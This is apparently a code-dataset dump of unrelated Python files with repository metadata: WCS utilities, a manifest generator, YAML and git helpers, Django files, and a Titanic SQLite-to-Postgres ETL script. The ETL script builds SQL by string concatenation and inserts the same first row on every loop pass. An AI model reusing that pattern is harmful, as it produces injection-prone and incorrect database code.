except ImportError:
    # Bug fix: the pure-Python fallback previously imported only
    # Loader and Dumper, so `load` was undefined (NameError) whenever
    # CLoader was unavailable.
    from yaml import Loader, Dumper, load

# Parse the library definition that drives code generation; `with`
# guarantees the file is closed even if parsing raises.
with open(os.path.join(__location__, 'generated_library.yml'), 'r') as text_io:
    data = load(text_io, Loader=Loader)

env = Environment(
    loader=FileSystemLoader(os.path.join(__location__, "templates")),
    # autoescape=select_autoescape(['html'])
)
def camelcase_to_snake_case(name):
    """Convert a CamelCase identifier to snake_case."""
    # First split before each capitalized word (upper followed by lowers),
    # then before any remaining upper that follows a lowercase or digit.
    with_word_breaks = re.sub(r'(.)([A-Z][a-z]+)', r'\1_\2', name)
    return re.sub(r'([a-z0-9])([A-Z])', r'\1_\2', with_word_breaks).lower()
# Expose the snake_case converter to templates as the `normalize` filter.
env.filters['normalize'] = camelcase_to_snake_case

# generating api methods: render one output file per entry in `lib_def`.
for i in data["lib_def"]:
    file_name = data["lib_def"][i]["file"]
    template_name = data["lib_def"][i]["template"]
    entries = data["lib_def"][i]["entries"]
    print("generated", "./lib/" + file_name)
    template = env.get_template(template_name)
    rendered = template.render(entries=entries)
    # `with` replaces the manual open/write/close so the output file is
    # closed even if the write fails.
    with open(os.path.join(__location__, "./lib/" + file_name), "w") as f:
        f.write(rendered)
# generating api actions: one generated module per action entry, named by
# the snake_case form of the entry's `name`.
for i in data["actions"]:
    base_path = data["actions"][i]["destination"]
    template_name = data["actions"][i]["template"]
    entries = data["actions"][i]["entries"]
    print("auto-generated", len(entries), "actions in destination", base_path)
    template = env.get_template(template_name)
    for item in entries:
        rendered = template.render(item=item)
        dest = os.path.join(__location__, "./lib/" + base_path + "/" +
                            camelcase_to_snake_case(item["name"]) + ".py")
        # `with` replaces the manual open/write/close so each output file
        # is closed even if the write fails.
        with open(dest, "w") as f:
            f.write(rendered)

print("OK")
| 32.511364 | 92 | 0.695211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,477 | 0.516253 |
25e663ed5a1d36a9f0c450a6e3fe032554c705e8 | 5,375 | py | Python | gammapy/utils/wcs.py | grburgess/gammapy | 609e460698caca7223afeef5e71826c7b32728d1 | [
"BSD-3-Clause"
] | 3 | 2019-01-28T12:21:14.000Z | 2019-02-10T19:58:07.000Z | gammapy/utils/wcs.py | grburgess/gammapy | 609e460698caca7223afeef5e71826c7b32728d1 | [
"BSD-3-Clause"
] | null | null | null | gammapy/utils/wcs.py | grburgess/gammapy | 609e460698caca7223afeef5e71826c7b32728d1 | [
"BSD-3-Clause"
] | null | null | null | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""WCS related utility functions."""
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
from astropy.wcs import WCS
from astropy.coordinates import Angle
__all__ = [
'linear_wcs_to_arrays',
'linear_arrays_to_wcs',
'get_wcs_ctype',
'get_resampled_wcs'
]
def get_wcs_ctype(wcs):
"""
Get celestial coordinate type of WCS instance.
Parameters
----------
wcs : `~astropy.wcs.WCS`
WCS transformation instance.
Returns
-------
ctype : {'galatic', 'icrs'}
String specifying the coordinate type, that can be used with
`~astropy.coordinates.SkyCoord`
"""
ctype = wcs.wcs.ctype
if 'GLON' in ctype[0] or 'GLON' in ctype[1]:
return 'galactic'
elif 'RA' in ctype[0] or 'RA' in ctype[1]:
return 'icrs'
else:
raise TypeError("Can't determine WCS coordinate type.")
def get_resampled_wcs(wcs, factor, downsampled):
"""
Get resampled WCS object.
"""
wcs = wcs.deepcopy()
if not downsampled:
factor = 1. / factor
wcs.wcs.cdelt *= factor
wcs.wcs.crpix = (wcs.wcs.crpix - 0.5) / factor + 0.5
return wcs
def linear_wcs_to_arrays(wcs, nbins_x, nbins_y):
"""Make a 2D linear binning from a WCS object.
This method gives the correct answer only for linear X, Y binning.
The method expects angular quantities in the WCS object.
X is identified with WCS axis 1, Y is identified with WCS axis 2.
The method needs the number of bins as input, since it is not in
the WCS object.
Parameters
----------
wcs : `~astropy.wcs.WCS`
WCS object describing the bin coordinates
nbins_x : int
number of bins in X coordinate
nbins_y : int
number of bins in Y coordinate
Returns
-------
bin_edges_x : `~astropy.coordinates.Angle`
array with the bin edges for the X coordinate
bin_edges_y : `~astropy.coordinates.Angle`
array with the bin edges for the Y coordinate
"""
# check number of dimensions
if wcs.wcs.naxis != 2:
raise ValueError("Expected exactly 2 dimensions, got {}"
.format(wcs.wcs.naxis))
# check that wcs axes are linear
# TODO: is there an easy way to do this?
# set bins
unit_x, unit_y = wcs.wcs.cunit
delta_x, delta_y = wcs.wcs.cdelt
delta_x = Angle(delta_x, unit_x)
delta_y = Angle(delta_y, unit_y)
bin_edges_x = np.arange(nbins_x + 1) * delta_x
bin_edges_y = np.arange(nbins_y + 1) * delta_y
# translate bins to correct values according to WCS reference
# In FITS, the edge of the image is at pixel coordinate +0.5.
refpix_x, refpix_y = wcs.wcs.crpix
refval_x, refval_y = wcs.wcs.crval
refval_x = Angle(refval_x, unit_x)
refval_y = Angle(refval_y, unit_y)
bin_edges_x += refval_x - (refpix_x - 0.5) * delta_x
bin_edges_y += refval_y - (refpix_y - 0.5) * delta_y
# set small values (compared to delta (i.e. step)) to 0
for i in np.arange(len(bin_edges_x)):
if np.abs(bin_edges_x[i] / delta_x) < 1.e-10:
bin_edges_x[i] = Angle(0., unit_x)
for i in np.arange(len(bin_edges_y)):
if np.abs(bin_edges_y[i] / delta_y) < 1.e-10:
bin_edges_y[i] = Angle(0., unit_y)
return bin_edges_x, bin_edges_y
def linear_arrays_to_wcs(name_x, name_y, bin_edges_x, bin_edges_y):
"""Make a 2D linear WCS object from arrays of bin edges.
This method gives the correct answer only for linear X, Y binning.
X is identified with WCS axis 1, Y is identified with WCS axis 2.
Parameters
----------
name_x : str
name of X coordinate, to be used as 'CTYPE' value
name_y : str
name of Y coordinate, to be used as 'CTYPE' value
bin_edges_x : `~astropy.coordinates.Angle`
array with the bin edges for the X coordinate
bin_edges_y : `~astropy.coordinates.Angle`
array with the bin edges for the Y coordinate
Returns
-------
wcs : `~astropy.wcs.WCS`
WCS object describing the bin coordinates
"""
# check units
unit_x = bin_edges_x.unit
unit_y = bin_edges_y.unit
if unit_x != unit_y:
ss_error = "Units of X ({0}) and Y ({1}) bins do not match!".format(
unit_x, unit_y)
ss_error += " Is this expected?"
raise ValueError(ss_error)
# Create a new WCS object. The number of axes must be set from the start
wcs = WCS(naxis=2)
# Set up DET coordinates in degrees
nbins_x = len(bin_edges_x) - 1
nbins_y = len(bin_edges_y) - 1
range_x = Angle([bin_edges_x[0], bin_edges_x[-1]])
range_y = Angle([bin_edges_y[0], bin_edges_y[-1]])
delta_x = (range_x[1] - range_x[0]) / nbins_x
delta_y = (range_y[1] - range_y[0]) / nbins_y
wcs.wcs.ctype = [name_x, name_y]
wcs.wcs.cunit = [unit_x, unit_y]
wcs.wcs.cdelt = [delta_x.to(unit_x).value, delta_y.to(unit_y).value]
# ref as lower left corner (start of (X, Y) bin coordinates)
# coordinate start at pix = 0.5
wcs.wcs.crpix = [0.5, 0.5]
wcs.wcs.crval = [(bin_edges_x[0] + (wcs.wcs.crpix[0] - 0.5) * delta_x).to(unit_x).value,
(bin_edges_y[0] + (wcs.wcs.crpix[1] - 0.5) * delta_y).to(unit_y).value]
return wcs
| 32.97546 | 92 | 0.638884 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,713 | 0.504744 |
25e697ff2f7be1cfd4b989db2606e8b827aeb0d8 | 2,503 | py | Python | module2-sql-for-analysis/titantic_ETL.py | elliotgunn/DS-Unit-3-Sprint-2-SQL-and-Databases | c730e2b3e66199226fa7549511cbb7801eb7a694 | [
"MIT"
] | null | null | null | module2-sql-for-analysis/titantic_ETL.py | elliotgunn/DS-Unit-3-Sprint-2-SQL-and-Databases | c730e2b3e66199226fa7549511cbb7801eb7a694 | [
"MIT"
] | null | null | null | module2-sql-for-analysis/titantic_ETL.py | elliotgunn/DS-Unit-3-Sprint-2-SQL-and-Databases | c730e2b3e66199226fa7549511cbb7801eb7a694 | [
"MIT"
] | null | null | null | import pandas as pd
import psycopg2
import sqlite3
# don't commit this
dbname = ''
user = ''
password = ''
host = ''
pg_conn = psycopg2.connect(dbname=dbname, user=user,
password=password, host=host)
# connection object and cursor
pg_conn
pg_curs = pg_conn.cursor()
# extract: csv file
titanic_csv = 'titanic.csv'
df = pd.read_csv(titanic_csv)
df['Name'] = df['Name'].str.replace("'", "")
# create connection to blank sql 'titanic.sqlite3'
conn = sqlite3.connect('titanic.sqlite3')
# thus extract data from df to sql file
df.to_sql('titanic', conn, index=False, if_exists='replace') # Insert the values from the csv file into the table 'X'
# look at table
curs = conn.cursor()
query = 'SELECT * FROM titanic LIMIT 20'
pd.read_sql(query, conn)
t_curs = conn.cursor()
query = 'SELECT COUNT(*) FROM titanic;'
t_curs.execute(query).fetchall()
# our goal - an ETL/data pipeline from SQLite to Python
titanic = t_curs.execute('SELECT * FROM titanic;').fetchall()
# validate what we got
titanic[0]
# look at data types
t_curs.execute('PRAGMA table_info(titanic);').fetchall()
# extract done! next step, transform:
# we need the postgresql db to have a table
# with an appropriate schema
# we need a serial primary key as it's what links
# all the tables together
create_titanic_table = """
CREATE TABLE titanic (
id SERIAL PRIMARY KEY,
Survived INT,
Pclass INT,
Name VARCHAR(100),
Sex VARCHAR(10),
Age REAL,
Siblings_Spouses_Aboard INT,
Parents_Children_Aboard INT,
Fare REAL
);
"""
# create pg table
pg_curs.execute(create_titanic_table)
str(titanic[0])
# transform (making the target ready to get data) done
# now we need to insert actual characters
# example first
example_insert = """
INSERT INTO titanic
(Survived, PClass, Name, Sex, Age, Siblings_Spouses_Aboard, Parents_Children_Aboard, Fare)
VALUES """ + str(titanic[0])
print(example_insert)
# now do this for all characters
for row in titanic: # this refers to titanic in row 25
insert_titanic = """
INSERT INTO titanic
(Survived, PClass, Name, Sex, Age, Siblings_Spouses_Aboard, Parents_Children_Aboard, Fare)
VALUES """ + str(titanic[0]) + ';'
pg_curs.execute(insert_titanic)
# In[243]:
pg_curs.execute('SELECT * FROM titanic;')
pg_curs.fetchall()
# we can see it from this cursor but not elephantsql.com
# we must commit
pg_curs.close()
pg_conn.commit()
| 20.349593 | 117 | 0.688374 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,548 | 0.618458 |
25e777cd87df8c4a209cc04015cb7b7c4813329d | 999 | py | Python | merceedge/util/yaml.py | merceedge/MerceEdge | b1448fbaed912e04e1c71d3f2101f2f297eca794 | [
"Apache-2.0"
] | 6 | 2019-01-25T09:03:27.000Z | 2021-02-17T14:30:06.000Z | merceedge/util/yaml.py | merceedge/MerceEdge | b1448fbaed912e04e1c71d3f2101f2f297eca794 | [
"Apache-2.0"
] | null | null | null | merceedge/util/yaml.py | merceedge/MerceEdge | b1448fbaed912e04e1c71d3f2101f2f297eca794 | [
"Apache-2.0"
] | null | null | null | import yaml
from merceedge.exceptions import MerceEdgeError
from merceedge.settings import (
logger_access,
logger_code,
logger_console
)
_LOGGER = logger_code
def load_yaml(fname):
"""Load a YAML file."""
try:
with open(fname, encoding='utf-8') as conf_file:
# If configuration file is empty YAML returns None
# We convert that to an empty dict
return yaml.safe_load(conf_file) or {}
except yaml.YAMLError:
error = 'Error reading YAML configuration file {}'.format(fname)
_LOGGER.exception(error)
raise MerceEdgeError(error)
def write_yaml(fname, yaml_dict):
"""Write a yaml file from dict"""
try:
with open(fname, 'w', encoding='utf-8') as outfile:
yaml.dump(yaml_dict, outfile, default_flow_style=False)
except yaml.YAMLError:
error = 'Error write YAML configuration file {}'.format(fname)
_LOGGER.exception(error)
raise MerceEdgeError(error)
| 29.382353 | 72 | 0.660661 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 239 | 0.239239 |
25e918b72fd4f7774d359e037858b76d4d02a0ff | 4,891 | py | Python | manifest-build-tools/application/generate_manifest.py | dalebremner/on-tools | 18b826bca2a3608c5b50116ec710bbeb630a586e | [
"Apache-2.0"
] | 4 | 2015-12-08T20:02:53.000Z | 2019-03-08T07:42:24.000Z | manifest-build-tools/application/generate_manifest.py | dalebremner/on-tools | 18b826bca2a3608c5b50116ec710bbeb630a586e | [
"Apache-2.0"
] | 48 | 2016-01-28T23:50:38.000Z | 2017-10-20T13:38:03.000Z | manifest-build-tools/application/generate_manifest.py | dalebremner/on-tools | 18b826bca2a3608c5b50116ec710bbeb630a586e | [
"Apache-2.0"
] | 38 | 2015-11-02T23:49:37.000Z | 2021-05-27T01:24:03.000Z | #!/usr/bin/env python
# Copyright 2016, DELLEMC, Inc.
"""
The script generate a new manifest for a new branch according to another manifest.
For example,
new branch: release/branch-1.2.3
date: 2016-12-15 00:00:00
The generated new manifest: branch-1.2.3-20161215
usage:
./on-tools/manifest-build-tools/HWIMO-BUILD on-tools/manifest-build-tools/application/generate_manifest.py \
--branch master \
--date "$date" \
--timezone "+0800" \
--builddir b \
--force \
--git-credential https://github.com,GITHUB \
--jobs 8
The required parameters:
branch: The branch name of each repository in manifest file.
date: The commit of each repository are last commit before the date.
The valid date: current (the commit of each repository are the lastest commit")
yesterday (the commit of each repository are the last commit of yesterday")
date string, such as: 2016-12-01 00:00:00 (the commit of each repository are the last commit before the date")
timezone: The Time Zone for the date, such as: +0800, -0800, -0500
git-credential: Git credentials for CI services.
builddir: The directory for checked repositories.
The optional parameters:
force: If true, overwrite the destination manifest file even it already exists.
jobs: number of parallel jobs to run. The number is related to the compute architecture, multi-core processors...
"""
import os
import sys
import argparse
from dateutil.parser import parse
from datetime import datetime,timedelta
try:
import common
from ManifestGenerator import *
except ImportError as import_err:
print import_err
sys.exit(1)
def parse_command_line(args):
"""
Parse script arguments.
:return: Parsed args for assignment
"""
parser = argparse.ArgumentParser()
parser.add_argument("--branch",
required=True,
help="The branch of repositories in new manifest",
action="store")
parser.add_argument("--date",
default="current",
required=True,
help="Generate a new manifest with commit before the date, such as: current, yesterday, 2016-12-13 00:00:00",
action="store")
parser.add_argument("--timezone",
default="+0800",
required=True,
help="The time zone for parameter date",
action="store")
parser.add_argument("--builddir",
required=True,
help="destination for checked out repositories",
action="store")
parser.add_argument("--git-credential",
required=True,
help="Git credential for CI services",
action="append")
parser.add_argument("--force",
help="use destination manifest file, even if it exists",
action="store_true")
parser.add_argument("--jobs",
default=1,
help="Number of parallel jobs to run",
type=int)
parsed_args = parser.parse_args(args)
return parsed_args
def convert_date(date_str):
try:
if date_str == "yesterday":
utc_now = datetime.utcnow()
utc_yesterday = utc_now + timedelta(days=-1)
date = utc_yesterday.strftime('%Y%m%d 23:59:59')
dt = parse(date)
return dt
else:
dt = parse(date_str)
return dt
except Exception, e:
raise ValueError(e)
def main():
try:
# parse arguments
args = parse_command_line(sys.argv[1:])
slice_branch = args.branch.split("/")[-1]
if args.date == "current":
utc_now = datetime.utcnow()
day_str = utc_now.strftime("%Y%m%d")
dest_manifest = "{branch}-{day}".format(branch=slice_branch, day=day_str)
generator = ManifestGenerator(dest_manifest, args.branch, args.builddir, args.git_credential, jobs=args.jobs, force=args.force)
else:
dt = convert_date(args.date)
day_str = dt.strftime("%Y%m%d")
dest_manifest = "{branch}-{day}".format(branch=slice_branch, day=day_str)
date_str = "{0} {1}".format(dt.strftime("%Y-%m-%d %H:%M:%S"), args.timezone)
generator = SpecifyDayManifestGenerator(dest_manifest, args.branch, date_str, args.builddir, args.git_credential, jobs=args.jobs, force=args.force)
generator.update_manifest()
generator.generate_manifest()
except Exception, e:
print "Failed to generate new manifest for {0} due to \n{1}\nExiting now".format(args.branch, e)
sys.exit(1)
if __name__ == "__main__":
main()
sys.exit(0)
| 36.774436 | 159 | 0.605193 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,145 | 0.438561 |
25ed07e02dd91398ea331f8eb818d839d1301c57 | 1,132 | py | Python | src/infer_cgg.py | lepidodendron/lepidodendron | 1ca3efd2d43d2a644cf364ba811e16aad6a25f2b | [
"MIT"
] | null | null | null | src/infer_cgg.py | lepidodendron/lepidodendron | 1ca3efd2d43d2a644cf364ba811e16aad6a25f2b | [
"MIT"
] | 2 | 2019-01-30T17:10:31.000Z | 2019-02-11T07:17:51.000Z | src/infer_cgg.py | lepidodendron/lepidodendron | 1ca3efd2d43d2a644cf364ba811e16aad6a25f2b | [
"MIT"
] | null | null | null | from model_cgg import model
ckpt = "cgg_36"
mode = 1
from infer import infer, trim_str
from itertools import islice
from util_cw import CharWright
from util_io import load_txt, save_txt
from util_np import np, partition
from util_tf import tf
sess = tf.InteractiveSession()
# load model
cws = CharWright.load("../data/cws.pkl")
cwt = CharWright.load("../data/cwt.pkl")
m = model('infer', cws.dwh(), cwt.dwh())
saver = tf.train.Saver()
saver.restore(sess, "../ckpt/{}".format(ckpt))
# the first 4096 instances are used for validation
src = np.array(list(islice(load_txt("../data/src.txt"), 4096)))
tgt = np.array(list(islice(load_txt("../data/tgt.txt"), 4096)))
val = np.array(sorted(range(len(src)), key= lambda i: len(src[i])))
src = src[val]
tgt = tgt[val]
def translate(src, mode):
for i, j in partition(len(src), 256):
src_idx, len_src = cws(src[i:j], ret_img= False, ret_idx= True)
pred, pidx = infer(mode, m, sess, cwt, src_idx, len_src)
yield from trim_str(pidx, cwt)
save_txt("../tmp/prd", translate(src, mode))
save_txt("../tmp/tgt", tgt)
# sacrebleu -tok intl -b -i ../tmp/prd ../tmp/tgt
| 30.594595 | 71 | 0.681979 | 0 | 0 | 243 | 0.214664 | 0 | 0 | 0 | 0 | 230 | 0.20318 |
25ef3cf038f4dc0c0967a72f05b874c0bdc8e6a9 | 858 | py | Python | viberbot/api/viber_requests/viber_seen_request.py | AaganMaskey/viber-bot-python | 99224b6c777ee3ac9d26a4b1ccd6ae0193291edb | [
"Apache-2.0"
] | 1 | 2019-12-27T17:02:38.000Z | 2019-12-27T17:02:38.000Z | viberbot/api/viber_requests/viber_seen_request.py | AaganMaskey/viber-bot-python | 99224b6c777ee3ac9d26a4b1ccd6ae0193291edb | [
"Apache-2.0"
] | 1 | 2021-06-25T15:17:45.000Z | 2021-06-25T15:17:45.000Z | viberbot/api/viber_requests/viber_seen_request.py | Micuk/viber-bot-python | c090e40a2270f3fec5b5cd34f83334a5797d2bdd | [
"Apache-2.0"
] | null | null | null | from future.utils import python_2_unicode_compatible
from ..event_type import EventType
from viberbot.api.viber_requests.viber_request import ViberRequest
class ViberSeenRequest(ViberRequest):
def __init__(self):
super(ViberSeenRequest, self).__init__(EventType.SEEN)
self._message_token = None
self._user_id = None
def from_dict(self, request_dict):
super(ViberSeenRequest, self).from_dict(request_dict)
self._message_token = request_dict['message_token']
self._user_id = request_dict['user_id']
return self
@property
def meesage_token(self):
return self._message_token
@property
def user_id(self):
return self._user_id
@python_2_unicode_compatible
def __str__(self):
return u"ViberSeenRequest [{0}, message_token={1}, user_id={2}]" \
.format(super(ViberSeenRequest, self).__str__(), self._message_token, self._user_id)
| 28.6 | 87 | 0.785548 | 700 | 0.815851 | 0 | 0 | 321 | 0.374126 | 0 | 0 | 81 | 0.094406 |
25f048f3da02b6db6d6468726b80f5cf0a8210f8 | 172 | py | Python | tests/simple_test.py | leoauri/auraloss | 0e3362674ae1b53aa61c6a631fb4e6970c5683c1 | [
"Apache-2.0"
] | 272 | 2020-11-16T05:07:17.000Z | 2022-03-27T11:54:16.000Z | tests/simple_test.py | leoauri/auraloss | 0e3362674ae1b53aa61c6a631fb4e6970c5683c1 | [
"Apache-2.0"
] | 14 | 2020-11-20T03:16:14.000Z | 2021-12-01T17:50:41.000Z | tests/simple_test.py | leoauri/auraloss | 0e3362674ae1b53aa61c6a631fb4e6970c5683c1 | [
"Apache-2.0"
] | 32 | 2020-11-16T23:36:45.000Z | 2022-02-18T04:48:24.000Z | import torch
import auraloss
input = torch.rand(8, 2, 44100)
target = torch.rand(8, 2, 44100)
loss = auraloss.freq.SumAndDifferenceSTFTLoss()
print(loss(input, target))
| 17.2 | 47 | 0.744186 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
25f057af076ce41992855839a657edce5d7a7ef6 | 931 | py | Python | scripts/processcore.py | paulscottrobson/flat-forth-compiler | c9df5156219da67c08776445a87e055f8cbb3a82 | [
"MIT"
] | null | null | null | scripts/processcore.py | paulscottrobson/flat-forth-compiler | c9df5156219da67c08776445a87e055f8cbb3a82 | [
"MIT"
] | 1 | 2019-03-03T21:21:07.000Z | 2020-07-02T09:20:31.000Z | scripts/processcore.py | paulscottrobson/flat-forth-compiler | c9df5156219da67c08776445a87e055f8cbb3a82 | [
"MIT"
] | null | null | null | # ***************************************************************************************
# ***************************************************************************************
#
# Name : processcore.py
# Author : Paul Robson (paul@robsons.org.uk)
# Date : 22nd December 2018
# Purpose : Convert vocabulary.asm to assemblable file by adding marker labels.
#
# ***************************************************************************************
# ***************************************************************************************
#
# Copy vocabulary.asm to __words.asm
#
hOut = open("__words.asm","w")
for l in [x.rstrip() for x in open("vocabulary.asm").readlines()]:
hOut.write(l+"\n")
#
# If ;; found insert a label which is generated using ASCII so all chars can be used
#
if l[:2] == ";;":
name = "_".join([str(ord(x)) for x in l[2:].strip()])
hOut.write("core_{0}:\n".format(name))
hOut.close() | 38.791667 | 89 | 0.396348 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 721 | 0.774436 |
25f0a32bd79bafc09891b19c1a08035f8d13f0e4 | 151 | py | Python | basars_addons/schedules/__init__.py | Basars/basars-addons | 0719216613ab7c6d23b26e55b09b9b024e1485ad | [
"MIT"
] | null | null | null | basars_addons/schedules/__init__.py | Basars/basars-addons | 0719216613ab7c6d23b26e55b09b9b024e1485ad | [
"MIT"
] | null | null | null | basars_addons/schedules/__init__.py | Basars/basars-addons | 0719216613ab7c6d23b26e55b09b9b024e1485ad | [
"MIT"
] | null | null | null | from basars_addons.schedules.cosine_decay import InitialCosineDecayRestarts
from basars_addons.schedules.cosine_decay import CosineDecayWarmupRestarts
| 50.333333 | 75 | 0.92053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
25f245a11f95af9fdc33a4587bdc16ccdade0685 | 1,221 | py | Python | cctrans/core/baidu.py | wangchuan2008888/ChineseCloudTranslation | a5072e7ea05c9e0cd7d1aeb03e90645f50dc2d26 | [
"Apache-2.0"
] | 3 | 2018-11-03T09:04:21.000Z | 2018-11-03T09:05:26.000Z | cctrans/core/baidu.py | wangchuan2008888/ChineseCloudTranslation | a5072e7ea05c9e0cd7d1aeb03e90645f50dc2d26 | [
"Apache-2.0"
] | null | null | null | cctrans/core/baidu.py | wangchuan2008888/ChineseCloudTranslation | a5072e7ea05c9e0cd7d1aeb03e90645f50dc2d26 | [
"Apache-2.0"
] | 4 | 2018-11-03T09:05:20.000Z | 2018-11-05T12:00:30.000Z | import random
import hashlib
import requests
from cctrans import conf
import cctrans
def _sign(app_key, secret_key, text):
salt = random.randint(32768, 65536)
sign = app_key + text + str(salt) + secret_key
return hashlib.md5(sign.encode('utf8')).hexdigest(), salt
def _request_data(url, app_key, text, salt, sign, from_lang='en', to_lang='zh'):
"""
:rtype: object
"""
return "{url}?appid={app_key}&q={text}&from={from_lang}&to={to_lang}&salt={salt}&sign={sign}".format(
**locals()
)
def translation(text, url):
app_key = conf.baidu_app_id
secret_key = conf.baidu_secret_key
sign, salt = _sign(app_key, secret_key, text)
data = _request_data(url=url,
app_key=app_key,
text=text,
salt=salt,
sign=sign,
from_lang=cctrans.from_lang,
to_lang=cctrans.to_lang)
resp = requests.get(data).json()
if resp.get('trans_result'):
trans_result = resp['trans_result']
trans_result = [trans_content['dst'] for trans_content in trans_result]
return trans_result
else:
return None
| 27.75 | 105 | 0.594595 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 163 | 0.133497 |
25f290d98ec98408a67808ea297c1e47f77e24a9 | 3,648 | py | Python | joint_teapot/workers/git.py | BoYanZh/joint-teapot | 9eefd8bc01024a2dd74df10295c5b4411aad0645 | [
"MIT"
] | 2 | 2021-06-10T15:40:25.000Z | 2021-06-12T14:24:28.000Z | joint_teapot/workers/git.py | BoYanZh/joint-teapot | 9eefd8bc01024a2dd74df10295c5b4411aad0645 | [
"MIT"
] | null | null | null | joint_teapot/workers/git.py | BoYanZh/joint-teapot | 9eefd8bc01024a2dd74df10295c5b4411aad0645 | [
"MIT"
] | 2 | 2021-09-15T16:09:59.000Z | 2021-09-15T16:11:32.000Z | import os
import sys
from time import sleep
from typing import Optional
from joint_teapot.utils.logger import logger
current_path = sys.path[0]
sys.path.remove(current_path)
from git import Repo
from git.exc import GitCommandError
sys.path.insert(0, current_path)
from joint_teapot.config import settings
class Git:
def __init__(
self,
org_name: str = settings.gitea_org_name,
repos_dir: str = settings.repos_dir,
):
self.org_name = org_name
if not os.path.isdir(repos_dir):
raise Exception(f"{repos_dir} does not exist! Create it first.")
self.repos_dir = repos_dir
logger.debug("Git initialized")
def clone_repo(
self, repo_name: str, branch: str = "master", auto_retry: bool = True
) -> Optional[Repo]:
repo = None
repo_dir = os.path.join(self.repos_dir, repo_name)
retry_interval = 2
while retry_interval and auto_retry:
try:
repo = Repo.clone_from(
f"ssh://git@focs.ji.sjtu.edu.cn:2222/{self.org_name}/{repo_name}.git",
repo_dir,
branch=branch,
)
retry_interval = 0
except GitCommandError as e:
if "Connection refused" in e.stderr or "Connection reset" in e.stderr:
logger.warning(
f"{repo_name} connection refused/reset in clone. "
"Probably by JI firewall."
)
logger.info(f"wait for {retry_interval} seconds to retry...")
sleep(retry_interval)
if retry_interval < 64:
retry_interval *= 2
elif f"Remote branch {branch} not found in upstream origin" in e.stderr:
retry_interval = 0
logger.error(f"{repo_name} origin/{branch} not found")
else:
raise
return repo
def get_repo(self, repo_name: str) -> Optional[Repo]:
repo_dir = os.path.join(self.repos_dir, repo_name)
if os.path.exists(repo_dir):
return Repo(repo_dir)
return self.clone_repo(repo_name)
def repo_clean_and_checkout(
self, repo_name: str, checkout_dest: str, auto_retry: bool = True
) -> str:
repo_dir = os.path.join(self.repos_dir, repo_name)
repo = self.get_repo(repo_name)
if not repo:
return repo_dir
retry_interval = 2
while retry_interval and auto_retry:
try:
repo.git.fetch("--tags", "--all", "-f")
repo.git.reset("--hard", "origin/master")
repo.git.clean("-d", "-f", "-x")
repo.git.checkout(checkout_dest)
retry_interval = 0
except GitCommandError as e:
if "Connection refused" in e.stderr or "Connection reset" in e.stderr:
logger.warning(
f"{repo_name} connection refused/reset in fetch. "
"Probably by JI firewall."
)
logger.info(f"wait for {retry_interval} seconds to retry...")
sleep(retry_interval)
if retry_interval < 64:
retry_interval *= 2
elif "Remote branch master not found in upstream origin" in e.stderr:
retry_interval = 0
logger.error(f"{repo_name} origin/master not found")
else:
raise
return repo_dir
| 37.22449 | 90 | 0.544682 | 3,336 | 0.914474 | 0 | 0 | 0 | 0 | 0 | 0 | 702 | 0.192434 |
25f4632219bc28cba2e575a7f1f0e698d9f3b930 | 307 | py | Python | converters/all_lp2dgf.py | daajoe/transit_graphs | ac9a7b390f0f4c671a4c66157c9ff20773bb0105 | [
"CC-BY-4.0"
] | null | null | null | converters/all_lp2dgf.py | daajoe/transit_graphs | ac9a7b390f0f4c671a4c66157c9ff20773bb0105 | [
"CC-BY-4.0"
] | null | null | null | converters/all_lp2dgf.py | daajoe/transit_graphs | ac9a7b390f0f4c671a4c66157c9ff20773bb0105 | [
"CC-BY-4.0"
] | null | null | null | #!/usr/bin/env bash
trap 'ret=$?; printf "%s\n" "$ERR_MSG" >&2; exit "$ret"' ERR
for file in $(find $1 -name \*.lp.bz2) ; do
echo $file
outputname="../gr/subgraphs/$(basename $file).gr"
./lp2dgf.py -f $file > $outputname
if [ $? -ne 0 ]; then
echo 'ERROR stopping...'
exit 1
fi
done
| 21.928571 | 60 | 0.566775 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 127 | 0.413681 |
25f55d84b2c9772cbbe9d0c481378e4191bf77e2 | 362 | py | Python | formulario/urls.py | exildev/Rondax | a4a4cad4ec9c575a288f66a353e07e9a57362ede | [
"Apache-2.0"
] | null | null | null | formulario/urls.py | exildev/Rondax | a4a4cad4ec9c575a288f66a353e07e9a57362ede | [
"Apache-2.0"
] | null | null | null | formulario/urls.py | exildev/Rondax | a4a4cad4ec9c575a288f66a353e07e9a57362ede | [
"Apache-2.0"
] | null | null | null | from django.conf.urls import include, url
from formulario import views
urlpatterns = [
url(r'^form/registro/(?P<pk>\d+)/$', views.RegistroSupraForm.as_view(), name='form_registro'),
url(r'^form/registro/create/$', views.RegistroCreateSupraForm.as_view(), name='form_crear_registro'),
url(r'^list/campo/$', views.CampoListView.as_view(), name='campo_list'),
] | 45.25 | 102 | 0.740331 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 121 | 0.334254 |
25f569e19f03eb74cba3e7ed842d1742b9a17719 | 381 | py | Python | customers/customerauth/migrations/0002_auto_20190127_0931.py | nkmrohit/python | bd644d51909cda548684b5da98eab998564f3568 | [
"Apache-2.0"
] | null | null | null | customers/customerauth/migrations/0002_auto_20190127_0931.py | nkmrohit/python | bd644d51909cda548684b5da98eab998564f3568 | [
"Apache-2.0"
] | null | null | null | customers/customerauth/migrations/0002_auto_20190127_0931.py | nkmrohit/python | bd644d51909cda548684b5da98eab998564f3568 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 2.1.4 on 2019-01-27 04:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('customerauth', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='customers',
name='address',
field=models.TextField(blank=True),
),
]
| 20.052632 | 47 | 0.593176 | 288 | 0.755906 | 0 | 0 | 0 | 0 | 0 | 0 | 95 | 0.249344 |
